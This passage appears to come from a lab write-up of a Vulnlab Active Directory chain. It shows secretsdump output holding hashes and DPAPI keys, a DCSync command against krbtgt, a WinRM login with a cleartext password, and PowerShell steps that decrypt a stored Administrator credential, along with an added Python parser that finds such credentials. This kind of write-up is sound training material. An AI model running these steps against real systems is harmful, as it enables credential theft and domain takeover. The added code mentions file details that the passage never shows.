Impacket v0.13.0.dev0+20241210.172718.365fccfc - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b43<REDACTED>:1e10fc<REDACTED>:::
Guest:501:aad3b435b51404e<REDACTED>:31d6cfe<REDACTED>:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:93227b3f06e6a5addc8108a00ebc8a39d272f2894fce2c8e185146f8213b6d82776c6bf898e72b97c80df58a5d61ea770ebb18f9bdd8204d38125488e8a9b07e5e9acc6957d61f164dc23fc371996cdfa6ac8a98ed0a2819cfc2235007bafe93c35cf0b9667a4540a45eab904c9d1ee2acfaa362780440c734ebc0b23f0a638dcb6356511b0df26e9ea866935119690d768e772c1fbfd549d76cec367122f7e40a6206d61a222ef5f431862b0b2b211022916dc14885f4cedb0aa31eed4b95ab71f7a39b391fbce8489479d14223c5aaabfd8d9d2a689db25551ac03a206089886191155230097b95d5fa3da3bb8d907
$MACHINE.ACC: aad3b435b51404eeaa<REDACTED>:bc9fe3e<REDACTED>
[*] DPAPI_SYSTEM
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...
Using the DC's computer account (lusdc$), we can perform a DCSync attack. We now own the domain!
exegol-chains sam $ secretsdump -just-dc-user krbtgt -hashes :"bc9fe3e1c45<REDACTED>" "lustrous.vl"/"lusdc$"@"10.10.220.69"
LusMS.lustrous.vl
Initial Access & Privilege Escalation
After collecting domain data with RustHound and importing it into BloodHound, I found that the user ben.cox is a member of the Remote Access group. If we try to connect with this user through WinRM to the LusMS machine, it works:
exegol-chains /workspace $ nxc winrm 10.10.202.182 -u 'ben.cox' -p '<REDACTED>'
WINRM 10.10.202.182 5985 LUSMS [*] Windows Server 2022 Build 20348 (name:LUSMS) (domain:lustrous.vl)
WINRM 10.10.202.182 5985 LUSMS [+] lustrous.vl\ben.cox:Trinity1 (admin)
Once connected to the machine through WinRM, we can see a file named admin.xml on the Desktop. Let's download it with Evil-WinRM:
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> ls
Directory: C:\Users\ben.cox\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2021 10:30 AM 1652 admin.xml
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> download admin.xml
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\Users\ben.cox\Desktop\admin.xml to admin.xml
Info: Download successful!
The file appears to be an exported PSCredential whose password is stored as a SecureString, the usual way to keep an encrypted password for use in a PowerShell script. Here is a nice article explaining how it works:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">LUSMS\Administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002<REDACTED></SS>
</Props>
</Obj>
</Objs>
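Files like admin.xml are worth hunting for on shares and user profiles, because a DPAPI-protected SecureString is a stored credential that any process running as the exporting user can unwrap. The following added example (not from the original write-up) parses Clixml documents of this shape, reports every PSCredential they contain and recognises the DPAPI blob header that the hex in admin.xml starts with; the sample document and its shortened blob are constructed for the example.

```python
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
PSCREDENTIAL = "System.Management.Automation.PSCredential"
# A DPAPI blob begins with version 1 followed by the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb, which is exactly how the hex in admin.xml starts.
DPAPI_HEADER_HEX = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

# Constructed Clixml document in the same shape as admin.xml (blob shortened and made up).
SAMPLE_CLIXML = r"""<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">LUSMS\Administrator</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb00000000000000000000</SS>
    </Props>
  </Obj>
  <S>just a string, not a credential</S>
</Objs>"""


def find_exported_credentials(clixml):
    """Return one dict per PSCredential object found in an Export-Clixml document."""
    if isinstance(clixml, str):
        clixml = clixml.encode("utf-8")
    # Parsing bytes lets the XML parser honour a BOM: Windows PowerShell typically writes
    # Clixml as UTF-16, which is the pair of garbled characters shown at the top of admin.xml.
    root = ET.fromstring(clixml)
    ns = {"ps": PS_NS}
    found = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        types = [t.text for t in obj.findall("ps:TN/ps:T", ns)]
        if PSCREDENTIAL not in types:
            continue
        user = obj.findtext("ps:Props/ps:S[@N='UserName']", default="", namespaces=ns)
        blob = obj.findtext("ps:Props/ps:SS[@N='Password']", default="", namespaces=ns).strip()
        if blob.lower().startswith(DPAPI_HEADER_HEX):
            protection = "dpapi-user"   # only the exporting user's DPAPI master key unwraps it
        elif blob:
            protection = "other"        # e.g. ConvertFrom-SecureString -Key output
        else:
            protection = "none"
        found.append({"username": user, "protection": protection, "blob_bytes": len(blob) // 2})
    return found


if __name__ == "__main__":
    for cred in find_exported_credentials(SAMPLE_CLIXML):
        print(f"[!] stored credential for {cred['username']} ({cred['protection']}, "
              f"{cred['blob_bytes']} byte blob)")
```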
We need PowerShell to decrypt the password, and because the SecureString is protected with DPAPI it can only be decrypted in the context of the user who created it, so let's go back to our WinRM session as ben.cox:
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $user = "LUSMS\Administrator"
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e56000000000200000000000<REDACTED>" | ConvertTo-SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
*Evil-WinRM* PS C:\Users\ben.cox\Documents> $cred.GetNetworkCredential() | fl
UserName : Administrator
Password : XZ9i=bgA8<REDACTED>
SecurePassword : System.Security.SecureString
Domain : LUSMS
We can now retrieve the flag, and we are done with this machine.
The part about the web service was really cool! Another technique to add to our skill set, and again an amazing chain from Vulnlab!